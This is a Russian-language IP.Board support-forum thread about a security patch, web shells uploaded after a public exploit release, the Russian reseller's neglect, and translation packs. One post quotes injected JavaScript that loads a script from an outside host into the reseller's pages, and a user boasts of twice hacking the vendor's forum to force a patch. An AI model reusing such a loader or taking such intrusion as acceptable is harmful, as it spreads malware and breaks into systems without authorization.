Перейти к публикации
Дизайн и модификация IPS Community IPBSkinsBETA
Поиск в
  • Дополнительно...
Искать результаты, содержащие...
Искать результаты в...
siv1987

Security update

Рекомендованные сообщения

А знаете что бесит больше всего?! То что до выхода этих обновлений, все было отлично. Как только стало известно что есть дыра и то что вышел патч, то сразу же начались заливки шеллов... Мне кажется уж лучше бы сделали обновление дистра и просто предложили обновиться, тихо и молча )))

Поделиться сообщением


Ссылка на сообщение

еще в папке uploads находилось три файла: 33e34866fa7dd24bc7d0091daae6031f.php, b65840916dc6f0ccc3b41fc9611e7e02.php и f9a859fa33368da398a7eb96773fb836.php

Поделиться сообщением


Ссылка на сообщение

А знаете что бесит больше всего?! То что до выхода этих обновлений, все было отлично. Как только стало известно что есть дыра и то что вышел патч, то сразу же начались заливки шеллов... Мне кажется уж лучше бы сделали обновление дистра и просто предложили обновиться, тихо и молча )))

За последние 2 года я лично отправлял около 40 репортов об уязвимостях большей или меньшей сложности. Был и код, кладущий сервер "на лопатки", и XSS, и SQL Injection, и много чего еще. Все это молча латалось в очередном обновлении. А в данном случае проблема не в том, какая открылась дыра, и не в том, как отреагировали IPS, а в том, КТО нашел дыру. Этот типичный "фрилансер - специалист по безопасности", которому необходима слава и известность, и потому, только открыв уязвимость, он тут же радостно распихал код своего эксплоита по всем существующим в мире хак-ресурсам, так что ни о каком "тихом" закрытии дыры речь уже не шла.

 

Hi, my name is Egidio Romano (aka EgiX) and I'm a freelance web application security researcher.

Погуглите эту фразу. Этот человек регулярно кидает сразу в паблик найденные дыры во всех подряд продуктах. Посылайте лучики любви ему.

  • Upvote 3

Поделиться сообщением


Ссылка на сообщение

Не понятно почему ibresource.ru 14 дней не давал информации о проблеме и не предлагал ставить латки??

Поделиться сообщением


Ссылка на сообщение
Не понятно почему ibresource.ru 14 дней не давал информации о проблеме и не предлагал ставить латки??

Потому что им как всегда насмешить на своих клиентов, не? :)

  • Upvote 2

Поделиться сообщением


Ссылка на сообщение

Потому что им как всегда насмешить на своих клиентов

Полностью согласен, да они как мне известно и продавать то ее уже не имеют право.

Поделиться сообщением


Ссылка на сообщение

У них сейчас другая игрушка, а с IP.Board они просто "додаивают" остатки денег. Переводы давно не обновляют - тупо меняют циферки версии и добавляют пару строк. Паджинатор как перевели неправильно полгода назад - так и не исправили. Компоненты все отстали уже на 1-2 версии от IPS-овских, а галерея так и вообще на 5 минорных и одну мажорную. Форум заброшен и часто вообще не работает. "Русификацию" свою нифига не тестируют. За новостями и патчами не следят. Минимум телодвижений. Да и зачем? Другая игрушка есть, а IPB не удаляется по одной причине - пока дураки деньги просто так будут нести - будут брать. Как нести перенстанут - закроют лавочку.

  • Upvote 1

Поделиться сообщением


Ссылка на сообщение

@Ritsuka, А где ж тогда покупать русскоязычную версию???

Поделиться сообщением


Ссылка на сообщение

@Семёныч, пока не появится в России нормальный реселлер, покупать русскую версию негде. Увы.

Видимо свои форумы буду конвертировать в Битрикс и LogicBoard (один конвертировал, функциональности меньше, но терпимо, работает). Но..

Первый вариант слишком дорог, не всем пойдет, а также жрет ну очень много ресурсов, малофункционален, но вроде как надежен - все-таки фреймворк от серьезного разработчика. Второй вариант дешев, тоже малофункционален (но поболее нежели у Битрикс), совсем нет шаблонов дизайна, а самому кастомизировать непросто - сложнее нежели для IPB, разработчик - одиночка, форум поддержки нагло окупировали спамеры и бессовестно предлагают свои услуги - как-то все получается несерьезно.

А так, что делать? Жить на том, что есть и нудеть (как про меня сказал в личку самый умный господин на этом форуме) и "ждать у моря погоды" ©.

Поделиться сообщением


Ссылка на сообщение

@Ritsuka, А где ж тогда покупать русскоязычную версию???

Берешь eng. Далее можешь перелопатить ее как угодно.

При наличии времени и опыта - конечно.

Поделиться сообщением


Ссылка на сообщение

Ritsuka, А где ж тогда покупать русскоязычную версию???

Полный бесплатный русский перевод от Yurri:

http://community.invisionpower.com/files/file/5545-full-russian-suite-for-ipboard-3rd-apps-

 

Русский перевод от IBR, бесплатно залитый на IPS и обновляемый "энтузиастом" (содержит забавные косяки):

http://community.invisionpower.com/files/file/5437-russian-language-pack-for-ipb-32x-and-higher-proper-translation/

 

А еще на 19% выполнен бесплатный коллективный перевод скрипта на русский язык:

http://community.invisionpower.com/index.php?app=languages

 

Можете просто взять любой готовый, или поучаствовать в коллективной работе по переводу.

 

А так, что делать? Жить на том, что есть и нудеть (как про меня сказал в личку самый умный господин на этом форуме) и "ждать у моря погоды" ©.

Что-то вы все больше становитесь похожим на спам. Ну ок, вы разочаровались в этой жизни, в IPB и вообще - ведь как же так, "за целых 4 года вдруг внезапно моментально запатченная дырка нашлась! никакой уверенности в завтрашнем дне!!!111" - но это еще не дает вам оснований во всех подряд темах и разделах, где люди спрашивают, как им решить проблемы с IP.Board, влезать с предложениями о переходе на другой скрипт. Мало того, что это никак не помогает в решении проблемы и вообще является оффтопом, это еще и раздражает. спам кончил баном. А вы как планируете?

  • Upvote 2

Поделиться сообщением


Ссылка на сообщение

Тема плавн оперешла в другое направление. Но я все вспрошу Ritsuka - какой по твоему мнению самый достойный перевод? от Yurri?

Поделиться сообщением


Ссылка на сообщение

Что-то вы все больше становитесь похожим на спам

У людей иногда бывает схожесть. Особенно если не вникать в мировоззрение собеседника, и вообще его не слушать (а только себя), но перед этим первым предложить беседовать.

 

А нудишь как раз сам. Начал нудеть на форуме IBR, продолжил на форуме и блогах IPS - всюду тебя забанили, что "наши", что "не наши".

 

Когда такие юноши как ты попадали служить в мое подразделение, как раз мне приходилось стоять у изголовья чуть ли не каждую ночь, чтобы не дай Бог кто-нить не обидел.

 

А теперь можешь и меня забанить.

Поделиться сообщением


Ссылка на сообщение
А теперь можешь и меня забанить.

Зачем? Пусть другие администраторы решают.

 

На IPS я, кстати, не совсем забанен, а в ридонли, и случилось это по 2 эпизодам:

 

1. Как-то отрепортив очередной критический баг, я, устав в течении 2 недель ждать очередного пачта или хоть какой-то реакции, дважды взломал через него их официальный форум. После этого уже через 2 дня вышел патч, но на меня обиделись.

 

2. Когда выходил IP.Nexus я активно сопротивлялся тому, чтобы он был закодирован, аппелируя к асбурдности аргумента "так будет безопаснее". И был прав - все платежные гейтвеи в конечном счете все равно оставили с открытым кодом (и где безопасность?), а закодированный код приложения не позволяет эффективно выявлять и исправлять многочисленные ошибки в скриптах - и в конечном итоге получилось, что, когда мои знакомые, или люди тут на форуме просят помочь с нексусом - ничего не остается, кроме как посылать всех в IPS.

 

А про IBR тут все и так знают - их было, и сейчас есть за что критиковать. Форум тогда каждый день наполнялся сотней спам-постов, а IBR было начхать. Единственной реакцией на все претензии был бан. Ну, зато хоть теперь спама нет. Правда, это не отменяет факта, что им и сейчас на все начхать, посмотрите хотя бы на первые строки кода страниц на их форуме:

<!--Csoul--><script type="text/javascript"><!--
var url = 'http://dosxfgb.servebbs.net';
document.write('<sc' + 'ript language="JavaScript" ' + 
'src="' + url + '/6201/counter.xhtml"></sc' + 
'ript>')
//--></script><!--/Csoul--><!DOCTYPE html>

 

Как затроянили им форум - так никто и не потрудился почистить.

 

Я называю "нудением" случаи, когда люди сгущают краски и рассказывают, как им самим плохо, выставляя их личные трудности как недостатки продукта. Вы выше писали, что у вас проблемы с излишне обостренным патриотизмом и с не знанием языков, и что именно это мешает вам продложать пользоваться IP.Board. Ок, вы имеете право на такую проблему. Но стоит ли теперь ходить и рассказывать всем, что "IP.Board умирает, надо искать альтернативы"? Вы что, считаете, что тем, кто осознанно выбрал IP.Board и имеет опыт общения с иностранными сайтами, ваши стоны кажутся актуальными? Тем более что один раз вы уже высказали свое мнение, и никто вам не мешал. Зачем теперь тиражировать ваше абстрактное субъективное по всем другим конкретным темам форума?

  • Upvote 2

Поделиться сообщением


Ссылка на сообщение

@GeoLik, и остальные желающие "переехать" на другие платформы, создавайте отдельно тему и обсуждайте там свой переезд, да и вообще можете перенести свое общение на ресурсах поддержки этих движков. Здесь форум поддержки ИПБ а не каких-то ЛБ или битриксов. Ваши сообщения порядком уже начали подноедать, ну прямо второй ойлфорум, тот тоже в каждом сообщение ныл о переезде, а до сих пор сидит на ипб. В этом отношении полностью солидарен с @Ritsuka. На этом флуд в этой теме закончим.

  • Upvote 1

Поделиться сообщением


Ссылка на сообщение

Создайте аккаунт или войдите в него для комментирования

Вы должны быть пользователем, чтобы оставить комментарий

Создать аккаунт

Зарегистрируйтесь для получения аккаунта. Это просто!

Зарегистрировать аккаунт

Войти

Уже зарегистрированы? Войдите здесь.

Войти сейчас

  • Сейчас на странице   0 пользователей

    Нет пользователей, просматривающих эту страницу.

×
×
  • Создать...